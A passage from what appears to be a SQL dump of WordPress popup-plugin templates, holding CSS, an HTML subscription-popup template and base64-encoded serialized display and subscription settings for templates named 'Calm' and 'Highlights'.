textarea {\r\n  	padding-left: 30px;\r\n  	font-size: 17px;\r\n  	background-image: url(\"[PPS_ASSETS_URL]img/assets/input-name.png\");\r\n	background-repeat: no-repeat;\r\n	background-position: 5px center;\r\n  	background-color: #fff;\r\n  	box-sizing: border-box;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect {\r\n	display: table;\r\n  	text-align: left;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	display: table-cell;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel {\r\n	opacity: 0.5;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	width: 100%;\r\n  	background-color: transparent;\r\n  	height: 40px;\r\n  	border: none;\r\n  	font-size: 17px;\r\n  	margin-left: -5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	font-family: inherit;\r\n  	height: auto;\r\n    padding-top: 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[name=\"email\"] {\r\n  	padding-left: 30px;\r\n    background-image: url(\"[PPS_ASSETS_URL]img/assets/input-email.png\");\r\n    background-repeat: no-repeat;\r\n    background-position: 5px center;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n	border-color: #000;\r\n  	font-family: \'Open Sans\', arial;\r\n	font-weight: 100;\r\n	color: #ffffff;\r\n  	float: left;\r\n  	width: 40%;\r\n	text-shadow: #000000 1px 1px 1px;\r\n  	[if bg_type_3 == \'color\']\r\n  	background: [bg_color_3];\r\n  	[elseif bg_type_3 == \'img\']\r\n  	background-image: url(\"[bg_img_3]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  	cursor: pointer;\r\n  	padding: 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:hover {\r\n	box-shadow: inset 1px 1px 3px #666;\r\n  	opacity:0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n  	text-align: center;\r\n  	font-family: \'Open Sans\', arial;\r\n 	font-weight: 100;\r\n	color: #ffffff;\r\n	text-shadow: #000000 1px 1px 1px;\r\n  	font-size: 17px;\r\n  	[if bg_type_4 == \'color\']\r\n  	color: [bg_color_4];\r\n  	[elseif bg_type_4 == \'img\']\r\n  	[endif]\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n  	margin-left: 70px;\r\n	margin-right: 40px;\r\n    float: left;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n  	position: static !important;\r\n  	background-image: none !important;\r\n    height: 40px !important;\r\n  	float:right !important;\r\n    [if bg_type_1 == \'color\']\r\n	background: [bg_color_1] !important;\r\n  	[elseif bg_type_1 == \'img\']\r\n  	background-image: url(\"[bg_img_1]\") !important;\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose.ppsPopupClose_lists_black {\r\n 	top: 0 !important;\r\n  	right: 0 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote{\r\n  	padding-left: 30px;\r\n	background-image: url(\"[PPS_ASSETS_URL]img/assets/security_ico.png\");\r\n	background-repeat: no-repeat;\r\n	background-position: 5px center;\r\n  	height: 20px;\r\n  	[if bg_type_4 == \'color\']\r\n  	color: [bg_color_4];\r\n  	[elseif bg_type_4 == \'img\']\r\n  	[endif]\r\n    font-family: \"Helvetica Neue\",Helvetica,Arial,sans-serif;\r\n    font-size: x-small;\r\n    font-style: italic;\r\n    line-height: 14px;\r\n  	margin: 5px 30px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubMsg {\r\n	clear: both;\r\n  	float: left;\r\n}','grey.png',1,1,1,1,0,0,0,'2015-01-10 17:59:43',11,0),(25,'Calm',1,0,'YTozOntzOjQ6Im1haW4iO2E6MTc6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNzoic2hvd19vbl9zY3JvbGxfd2luZG93X2RlbGF5IjtzOjE6IjAiO3M6MzM6InNob3dfb25fc2Nyb2xsX3dpbmRvd19wZXJjX3Njcm9sbCI7czoxOiIwIjtzOjI4OiJzaG93X29uX2FmdGVyX2luYWN0aXZlX3ZhbHVlIjtzOjI6IjEwIjtzOjg6ImNsb3NlX29uIjtzOjEwOiJ1c2VyX2Nsb3NlIjtzOjI1OiJjbG9zZV9vbl9hZnRlcl90aW1lX3ZhbHVlIjtzOjE6IjUiO3M6MTA6InNob3dfcGFnZXMiO3M6MzoiYWxsIjtzOjc6InNob3dfdG8iO3M6ODoiZXZlcnlvbmUiO3M6Mjk6InNob3dfdG9fZmlyc3RfdGltZV92aXNpdF9kYXlzIjtzOjI6IjMwIjtzOjMwOiJzaG93X3RvX3VudGlsX21ha2VfYWN0aW9uX2RheXMiO3M6MjoiMzAiO3M6MjE6ImhpZGVfZm9yX2RldmljZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX2Zvcl9wb3N0X3R5cGVzX3Nob3ciO3M6MToiMCI7czoxNzoiaGlkZV9mb3JfaXBzX3Nob3ciO3M6MToiMCI7czoxMjoiaGlkZV9mb3JfaXBzIjtzOjA6IiI7czoyMzoiaGlkZV9mb3JfY291bnRyaWVzX3Nob3ciO3M6MToiMCI7czoyMzoiaGlkZV9mb3JfbGFuZ3VhZ2VzX3Nob3ciO3M6MToiMCI7fXM6MzoidHBsIjthOjY1OntzOjU6IndpZHRoIjtzOjM6Ijk1MCI7czoxMzoid2lkdGhfbWVhc3VyZSI7czoyOiJweCI7czoxODoiYmdfb3ZlcmxheV9vcGFjaXR5IjtzOjM6IjAuNSI7czo5OiJiZ190eXBlXzAiO3M6MzoiaW1nIjtzOjg6ImJnX2ltZ18wIjtzOjM4OiJbUFBTX0FTU0VUU19VUkxdaW1nL2Fzc2V0cy9jYWxtX2JnLnBuZyI7czoxMDoiYmdfY29sb3JfMCI7czo3OiIjMjMyMzIzIjtzOjk6ImJnX3R5cGVfMSI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMSI7czowOiIiO3M6MTA6ImJnX2NvbG9yXzEiO3M6NzoiIzk0YjdjMCI7czo5OiJiZ190eXBlXzIiO3M6MzoiaW1nIjtzOjg6ImJnX2ltZ18yIjtzOjM1OiJbUFBTX0FTU0VUU19VUkxdaW1nL2Fzc2V0cy9sb2dvLnBuZyI7czoxMDoiYmdfY29sb3JfMiI7czowOiIiO3M6OToiYmdfdHlwZV8zIjtzOjM6ImltZyI7czo4OiJiZ19pbWdfMyI7czo0NToiW1BQU19BU1NFVFNfVVJMXWltZy9hc3NldHMvY2FsbV9jb2x1bW5fYmcucG5nIjtzOjEwOiJiZ19jb2xvcl8zIjtzOjA6IiI7czoxMDoiZm9udF9sYWJlbCI7czo3OiJkZWZhdWx0IjtzOjE2OiJsYWJlbF9mb250X2NvbG9yIjtzOjc6IiMwMDAwMDAiO3M6MTA6ImZvbnRfdHh0XzAiO3M6NzoiZGVmYXVsdCI7czoxNzoidGV4dF9mb250X2NvbG9yXzAiO3M6NzoiIzAwMDAwMCI7czoxMToiZm9udF9mb290ZXIiO3M6NzoiZGVmYXVsdCI7czoxNzoiZm9vdGVyX2ZvbnRfY29sb3IiO3M6NzoiIzAwMDAwMCI7czo5OiJjbG9zZV9idG4iO3M6MTE6ImNsYXNzeV9ncmV5IjtzOjc6ImJ1bGxldHMiO3M6MTE6Imxpc3RzX2dyZWVuIjtzOjExOiJsYXllcmVkX3BvcyI7czozOiJ0b3AiO3M6OToiZW5iX2xhYmVsIjtzOjE6IjEiO3M6NToibGFiZWwiO3M6MjI6IlN1YnNjcmliZSBhbmQgR2V0IE5ld3MiO3M6OToiZW5iX3R4dF8wIjtzOjE6IjEiO3M6OToiZm9vdF9ub3RlIjtzOjExODoiV2UgcmVzcGVjdCB5b3VyIHByaXZhY3kuIFlvdXIgaW5mb3JtYXRpb24gd2lsbCBub3QgYmUgc2hhcmVkIHdpdGggYW55IHRoaXJkIHBhcnR5IGFuZCB5b3UgY2FuIHVuc3Vic2NyaWJlIGF0IGFueSB0aW1lICI7czo2OiJlbmJfc20iO3M6MToiMSI7czoxNToiZW5iX3NtX2ZhY2Vib29rIjtzOjE6IjEiO3M6MTc6ImVuYl9zbV9nb29nbGVwbHVzIjtzOjE6IjEiO3M6MTQ6ImVuYl9zbV90d2l0dGVyIjtzOjE6IjEiO3M6OToic21fZGVzaWduIjtzOjQ6ImJveHkiO3M6MTQ6InVzZV9zc3NfcHJqX2lkIjtzOjE6IjAiO3M6ODoiYW5pbV9rZXkiO3M6NDoicHVmZiI7czoxMzoiYW5pbV9kdXJhdGlvbiI7czowOiIiO3M6MTM6ImVuYl9zdWJzY3JpYmUiO3M6MToiMSI7czo4OiJzdWJfZGVzdCI7czo5OiJ3b3JkcHJlc3MiO3M6MjM6InN1Yl93cF9jcmVhdGVfdXNlcl9yb2xlIjtzOjEwOiJzdWJzY3JpYmVyIjtzOjE5OiJzdWJfYXdlYmVyX2xpc3RuYW1lIjtzOjA6IiI7czoyMToic3ViX2F3ZWJlcl9hZHRyYWNraW5nIjtzOjA6IiI7czoyMToic3ViX21haWxjaGltcF9hcGlfa2V5IjtzOjA6IiI7czoxNDoic3ViX2dyX2FwaV9rZXkiO3M6MDoiIjtzOjE0OiJzdWJfYWNfYXBpX3VybCI7czowOiIiO3M6MTQ6InN1Yl9hY19hcGlfa2V5IjtzOjA6IiI7czoxODoic3ViX2FyX2Zvcm1fYWN0aW9uIjtzOjA6IiI7czoxMDoic3ViX3NnYV9pZCI7czowOiIiO3M6MTU6InN1Yl9zZ2FfbGlzdF9pZCI7czowOiIiO3M6MjE6InN1Yl9zZ2FfYWN0aXZhdGVfY29kZSI7czowOiIiO3M6MTA6InN1Yl9maWVsZHMiO2E6Mjp7czo0OiJuYW1lIjthOjc6e3M6MzoiZW5iIjtzOjE6IjEiO3M6NDoibmFtZSI7czo0OiJuYW1lIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo0OiJOYW1lIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMCI7fXM6NToiZW1haWwiO2E6Nzp7czo0OiJuYW1lIjtzOjU6ImVtYWlsIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo2OiJFLU1haWwiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIxIjtzOjM6ImVuYiI7czoxOiIxIjt9fXM6MjA6InN1Yl90eHRfY29uZmlybV9zZW50IjtzOjY3OiJDb25maXJtYXRpb24gbGluayB3YXMgc2VudCB0byB5b3VyIGVtYWlsIGFkZHJlc3MuIENoZWNrIHlvdXIgZW1haWwhIjtzOjE1OiJzdWJfdHh0X3N1Y2Nlc3MiO3M6MjQ6IlRoYW5rIHlvdSBmb3Igc3Vic2NyaWJlISI7czoyMToic3ViX3R4dF9pbnZhbGlkX2VtYWlsIjtzOjIyOiJFbXB0eSBvciBpbnZhbGlkIGVtYWlsIjtzOjE2OiJzdWJfcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoyODoic3ViX3R4dF9jb25maXJtX21haWxfc3ViamVjdCI7czozNDoiQ29uZmlybSBzdWJzY3JpcHRpb24gb24gW3NpdGVuYW1lXSI7czoyNToic3ViX3R4dF9jb25maXJtX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6Mjg6InN1Yl90eHRfY29uZmlybV9tYWlsX21lc3NhZ2UiO3M6MTk3OiJZb3Ugc3Vic2NyaWJlZCBvbiBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPi4gRm9sbG93IDxhIGhyZWY9XCJbY29uZmlybV9saW5rXVwiPnRoaXMgbGluazwvYT4gdG8gY29tcGxldGUgeW91ciBzdWJzY3JpcHRpb24uIElmIHlvdSBkaWQgbm90IHN1YnNjcmliZSBoZXJlIC0ganVzdCBpZ25vcmUgdGhpcyBtZXNzYWdlLiI7czozMToic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfc3ViamVjdCI7czozNzoiW3NpdGVuYW1lXSBZb3VyIHVzZXJuYW1lIGFuZCBwYXNzd29yZCI7czoyODoic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MzE6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX21lc3NhZ2UiO3M6NjU6IlVzZXJuYW1lOiBbdXNlcl9sb2dpbl08YnIgLz5QYXNzd29yZDogW3Bhc3N3b3JkXTxiciAvPltsb2dpbl91cmxdIjtzOjI1OiJzdWJfcmVkaXJlY3RfZW1haWxfZXhpc3RzIjtzOjA6IiI7czoxMzoic3ViX2J0bl9sYWJlbCI7czo2OiJTdWJtaXQiO3M6MTM6InN1Yl9uZXdfZW1haWwiO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjE1OiJzdWJfbmV3X21lc3NhZ2UiO3M6MTI5OiJZb3UgaGF2ZSBuZXcgc3Vic2NyaWJlciBvbiB5b3VyIHNpdGUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LCBoZXJlIHVzIHN1YnNjcmliZXIgaW5mb3JtYXRpb246PGJyIC8+W3N1YnNjcmliZXJfZGF0YV0iO3M6NToidHh0XzAiO3M6MTczOiI8cD5Qb3B1cCBieSBTdXBzeXN0aWMgbGV0cyB5b3UgZWFzaWx5IGNyZWF0ZSBlbGVnYW50IG92ZXJsYXBwaW5nIHdpbmRvd3Mgd2l0aCB1bmxpbWl0ZWQgZmVhdHVyZXMuIFBvcC11cHMgd2l0aCBTbGlkZXIsIExpZ2h0Ym94LCBDb250YWN0IGFuZCBTdWJzY3JpcHRpb24gZm9ybXMgYW5kIG1vcmUuPC9wPiI7fXM6MTA6Im9wdHNfYXR0cnMiO2E6Mjp7czo5OiJiZ19udW1iZXIiO3M6MToiNCI7czoxNjoidHh0X2Jsb2NrX251bWJlciI7czoxOiIxIjt9fQ==','<link rel=\"stylesheet\" type=\"text/css\" href=\"//fonts.googleapis.com/css?family=Dancing+Script\" />\r\n<link rel=\"stylesheet\" type=\"text/css\" href=\"//fonts.googleapis.com/css?family=Didact+Gothic\" />\r\n<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose ppsPopupClose_[close_btn]\"></a>\r\n	<div class=\"ppsInnerTblContent\">\r\n		<div class=\"ppsPopupListsInner ppsPopupInner\">\r\n			<div style=\"clear: both;\"></div>\r\n			<div class=\"ppsLeftCol\">\r\n				[if enb_txt_0]\r\n					<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0 ppsPopupTxt_0\">\r\n					[txt_0]\r\n					</div>\r\n				[endif]\r\n				[if enb_sm]\r\n					<div class=\"ppsSm\">\r\n					[sm_html]\r\n					</div>\r\n				[endif]\r\n				[if enb_foot_note]\r\n					<div class=\"ppsFootNote\">\r\n					[foot_note]\r\n					</div>\r\n				[endif]\r\n			</div>\r\n			<div class=\"ppsRightCol\">\r\n				[if enb_txt_1]\r\n					<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_1 ppsPopupTxt_1\">\r\n					[txt_1]\r\n					</div>\r\n				[endif]\r\n				<div class=\"logo\"></div>\r\n				[if enb_label]\r\n					<div class=\"label-window\">\r\n						<div class=\"ppsPopupLabel ppsPopupListsLabel\">[label]</div>\r\n					</div>\r\n				[endif]\r\n				<div style=\"clear: both;\"></div>\r\n				[if enb_subscribe]\r\n					<div class=\"ppsSubscribeShell\">\r\n						[sub_form_start]\r\n						[sub_fields_html]\r\n						<input type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n						[sub_form_end]\r\n						<div style=\"clear: both;\"></div>\r\n					</div>\r\n				[endif]\r\n			</div>\r\n		</div>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	padding: 15px;\r\n  	font-family: Georgia, Times, serif;\r\n	font-size: 13px;\r\n	line-height: 21px;\r\n	font-weight: normal;\r\n	color: #000;\r\n}\r\n#ppsPopupShell_[ID], #ppsPopupShell_[ID] * {\r\n	-webkit-box-sizing: content-box;\r\n	-moz-box-sizing:    content-box;\r\n	box-sizing:         content-box;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose.ppsPopupClose_classy_grey {\r\n	top: 26px;\r\n  	right: 26px;\r\n}\r\n#ppsPopupShell_[ID] .ppsInnerTblContent {\r\n	display: table;\r\n  	border-radius: 25px;\r\n  	[if bg_type_0 == \'color\']\r\n	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}), color-stop(100%, [bg_color_0])); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}\', endColorstr=\'[bg_color_0]\',GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_0 == \'img\']\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupInner {\r\n  {% if popup.params.tpl.enb_subscribe or popup.params.tpl.enb_foot_note or popup.params.tpl.enb_sm %}\r\n  	width: 50%;\r\n	[else]\r\n  	width: 100%;\r\n  	[endif]\r\n  	display: table-cell;\r\n}\r\n#ppsPopupShell_[ID] .label-window{\r\n    width: 100%;\r\n    padding-top: 10px;\r\n    padding-bottom: 10px;\r\n    margin-top: 20px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	color: #000;\r\n	font-family: \'Dancing Script\';\r\n	font-size: 50px;\r\n	font-weight: 100;\r\n	color: #000;\r\n	text-shadow: #000000 1px 1px 1px;\r\n	\r\n	padding-left: 20px;\r\n  	text-align:center;\r\n  	line-height: 1em;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsLeftCol {\r\n	float: left;\r\n  	width: 50%;\r\n 	border-radius: 20px;\r\n  	height: 100%;\r\n  	margin-bottom: 30px;\r\n  	margin-left: 30px;\r\n  	margin-top: 10%;\r\n  	line-height: 3.2em;\r\n    text-shadow: 0px 0px 0px black, 0 0 1em black;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsRightCol {\r\n	/*display: table-cell;*/\r\n  	float:right;\r\n  	width: 40%;\r\n  	border-radius:20px;\r\n  	height: 100%;\r\n  	margin-bottom: 30px;\r\n  	margin-right: 30px;\r\n  	margin-top: 65px;\r\n  	[if bg_type_3 == \'color\']\r\n	background: [bg_color_3]; \r\n	[elseif bg_type_3 == \'img\']\r\n  	background-image: url(\"[bg_img_3]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsRightCol .logo{\r\n  	display: table;\r\n    width: 150px;\r\n 	margin-left: 30%;\r\n 	margin-top: 30px;\r\n  	height: 150px;\r\n[if bg_type_2 == \'color\']\r\n	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}), color-stop(100%, [bg_color_2])); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}\', endColorstr=\'[bg_color_0]\',GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_2 == \'img\']\r\n  	background-image: url(\"[bg_img_2]\");\r\n  	[endif]\r\n  	background-repeat: no-repeat;\r\n  	background-size: auto 100%;\r\n}\r\n\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	padding: 30px 30px 0;\r\n	text-align: right;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	width: 100%;\r\n  	margin-bottom: 10px;\r\n  	height: 40px;\r\n  	border: none;\r\n  	border-radius: 3px;\r\n  	box-sizing: border-box;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n  	padding: 5px 5px 5px 10px;\r\n  	font-size: 17px;\r\n  	color: #000;\r\n  	border: 1px solid #928C8C;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect {\r\n	display: table;\r\n  	text-align: left;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	display: table-cell;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel {\r\n	opacity: 0.5;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	width: 100%;\r\n  	background-color: transparent;\r\n  	height: 40px;\r\n  	border: none;\r\n  	font-size: 17px;\r\n  	color: #fff;\r\n  	border-top-right-radius: 3px;\r\n  	border-bottom-right-radius: 3px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	font-family: inherit;\r\n  	height: auto;\r\n    padding-top: 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n	border-color: #000;\r\n  	font-family: \'Open Sans\', arial;\r\n	font-weight: 100;\r\n	color: #ffffff;\r\n  	width: 100%;\r\n	text-shadow: #000000 1px 1px 1px;\r\n  	padding: 5px;\r\n  	[if bg_type_1 == \'color\']\r\n  	background: [bg_color_1];\r\n    background: -moz-linear-gradient(90deg, [bg_color_2] 0%, {{ adjust_brightness(popup.params.tpl.bg_color_2, 100) }} 63%);\r\n    background: -webkit-linear-gradient(270deg, [bg_color_2] 0%, {{ adjust_brightness(popup.params.tpl.bg_color_2, 100) }} 63%);\r\n    background: -o-linear-gradient(270deg, [bg_color_2] 0%, {{ adjust_brightness(popup.params.tpl.bg_color_2, 100) }} 63%);\r\n    background: -ms-linear-gradient(270deg, [bg_color_2] 0%, {{ adjust_brightness(popup.params.tpl.bg_color_2, 100) }} 63%);\r\n    background: linear-gradient(0deg, [bg_color_2]) 0%, {{ adjust_brightness(popup.params.tpl.bg_color_2, 100) }} 63%);\r\n  	[elseif bg_type_1 == \'img\']\r\n  	background-image: url(\"[bg_img_1]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  	cursor: pointer;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:hover {\r\n	box-shadow: inset 1px 1px 3px #666;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n  	text-align: center;\r\n  	font-family: \'Didact Gothic\';\r\n 	font-weight: 100;\r\n	font-size: 42px;\r\n  	color:#fff;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n  	margin: 2px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose.ppsPopupClose_lists_black {\r\n 	top: 0 !important;\r\n  	right: 0 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote{\r\n	color: #585858;\r\n    font-family: \"Helvetica Neue\",Helvetica,Arial,sans-serif;\r\n    font-size: x-small;\r\n    font-style: italic;\r\n    line-height: 14px;\r\n  	margin: 5px 30px;\r\n}\r\n#ppsPopupShell_[ID] p {\r\n	margin: 0;\r\n}','Calm.png',1,1,1,1,0,0,0,'2015-01-10 17:59:43',12,0),(26,'Highlights',1,0,'YTozOntzOjQ6Im1haW4iO2E6MTc6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNzoic2hvd19vbl9zY3JvbGxfd2luZG93X2RlbGF5IjtzOjE6IjAiO3M6MzM6InNob3dfb25fc2Nyb2xsX3dpbmRvd19wZXJjX3Njcm9sbCI7czoxOiIwIjtzOjI4OiJzaG93X29uX2FmdGVyX2luYWN0aXZlX3ZhbHVlIjtzOjI6IjEwIjtzOjg6ImNsb3NlX29uIjtzOjEwOiJ1c2VyX2Nsb3NlIjtzOjI1OiJjbG9zZV9vbl9hZnRlcl90aW1lX3ZhbHVlIjtzOjE6IjUiO3M6MTA6InNob3dfcGFnZXMiO3M6MzoiYWxsIjtzOjc6InNob3dfdG8iO3M6ODoiZXZlcnlvbmUiO3M6Mjk6InNob3dfdG9fZmlyc3RfdGltZV92aXNpdF9kYXlzIjtzOjI6IjMwIjtzOjMwOiJzaG93X3RvX3VudGlsX21ha2VfYWN0aW9uX2RheXMiO3M6MjoiMzAiO3M6MjE6ImhpZGVfZm9yX2RldmljZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX2Zvcl9wb3N0X3R5cGVzX3Nob3ciO3M6MToiMCI7czoxNzoiaGlkZV9mb3JfaXBzX3Nob3ciO3M6MToiMCI7czoxMjoiaGlkZV9mb3JfaXBzIjtzOjA6IiI7czoyMzoiaGlkZV9mb3JfY291bnRyaWVzX3Nob3ciO3M6MToiMCI7czoyMzoiaGlkZV9mb3JfbGFuZ3VhZ2VzX3Nob3ciO3M6MToiMCI7fXM6MzoidHBsIjthOjU3OntzOjU6IndpZHRoIjtzOjM6IjY1MCI7czoxMzoid2lkdGhfbWVhc3VyZSI7czoyOiJweCI7czoxODoiYmdfb3ZlcmxheV9vcGFjaXR5IjtzOjM6IjAuNSI7czo5OiJiZ190eXBlXzAiO3M6MzoiaW1nIjtzOjg6ImJnX2ltZ18wIjtzOjQ0OiJbUFBTX0FTU0VUU19VUkxdaW1nL2Fzc2V0cy9oaWdobGlnaHRzLWJnLnBuZyI7czoxMDoiYmdfY29sb3JfMCI7czo3OiIjZmZmZmZmIjtzOjk6ImJnX3R5cGVfMSI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMSI7czowOiIiO3M6MTA6ImJnX2NvbG9yXzEiO3M6NzoiIzJjYWJiZSI7czo5OiJiZ190eXBlXzIiO3M6MzoiaW1nIjtzOjg6ImJnX2ltZ18yIjtzOjQ2OiJbUFBTX0FTU0VUU19VUkxdaW1nL2Fzc2V0cy9oaWdobGlnaHRzLWxvZ28ucG5nIjtzOjEwOiJiZ19jb2xvcl8yIjtzOjc6IiM0Yzc3ZjciO3M6MTA6ImZvbnRfbGFiZWwiO3M6NzoiZGVmYXVsdCI7czoxNjoibGFiZWxfZm9udF9jb2xvciI7czo3OiIjMWU3M2JlIjtzOjEwOiJmb250X3R4dF8wIjtzOjc